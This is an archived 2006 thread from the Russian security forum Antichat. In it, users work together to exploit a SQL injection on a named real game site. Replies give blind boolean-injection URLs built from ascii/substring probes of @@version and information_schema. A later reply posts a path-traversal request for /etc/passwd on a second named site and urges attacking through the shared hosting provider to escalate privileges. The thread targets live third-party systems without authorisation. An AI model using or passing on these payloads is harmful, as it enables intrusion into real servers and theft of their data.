ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
Помогите пожалуйста со сложной Mssql инъекцией. |
11.12.2006, 13:58
|
|
Познающий
Регистрация: 16.10.2006
Сообщений: 82
Провел на форуме:
248469
Репутация:
33
|
|
Помогите пожалуйста со сложной Mssql инъекцией.
Собственно нашел одну инъекцию:
_http://l2-existance.net/en/index.php?act=show_prof_info&indx=2')%20and%201=2--
_http://l2-existance.net/en/index.php?act=show_prof_info&indx=2')%20and%201=1--
Юнион селект не хочет делать, через ; тоже не получается. Есть ли возможность исполнять команды типа update или возможность сделать select? Заранее спасибо.
|
|
|
11.12.2006, 14:17
|
|
Reservists Of Antichat - Level 6
Регистрация: 16.07.2005
Сообщений: 653
Провел на форуме:
8854279
Репутация:
2727
|
|
читай http://rst.void.ru/papers/mysql_char_brute.txt
подбирай и перебирай через substring..
http://l2-existance.net/en/index.php?act=show_prof_info&indx=2')+and(ascii(su bstring(@@version,1,1))>100)--
http://l2-existance.net/en/index.php?act=show_prof_info&indx=2')+and(ascii(su bstring(@@version,1,1))>1)--
http://l2-existance.net/en/index.php?act=show_prof_info&indx=2')+and(ascii(su bstring('select+top+1+from+information_schema.tabl es',1,1))>120)--
http://l2-existance.net/en/index.php?act=show_prof_info&indx=2')+and(ascii(su bstring('select+top+1+from+information_schema.tabl es',1,1))>1)--
__________________
ПИУ-ПИУ...
Последний раз редактировалось c411k; 11.12.2006 в 14:20..
|
|
|
|
11.12.2006, 19:51
|
|
Познающий
Регистрация: 16.10.2006
Сообщений: 82
Провел на форуме:
248469
Репутация:
33
|
|
update никак не получится сделать? кстати в выражении http://l2-existance.net/en/index.php?act=show_prof_info&indx=2')+and(ascii(su bstring('select+top+1+from+in formation_schema.tables',1,1))>1)-- нет смысла, так как селект не вычисляется - ты задал его в виде строковой константы. То есть substring('select+top+1+from+information_schema.ta bles',1,100) = 'select+top+1+from+information_schema.tables'
Последний раз редактировалось vmn; 11.12.2006 в 19:58..
|
|
|
|
11.12.2006, 19:56
|
|
Флудер
Регистрация: 27.12.2005
Сообщений: 2,372
Провел на форуме:
5339610
Репутация:
4360
|
|
Юнион селект не хочет делать,
А ты поля перебирал?
update никак не получится сделать?
нет
|
|
|
|
11.12.2006, 20:27
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
http://la2shop.net/index.php?val=../../../../../../etc/passwd
На том же ip см. титли.
Вообще 1gb.ru дырявый до ужоса там винда права поднять банально ломай через хостинг
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
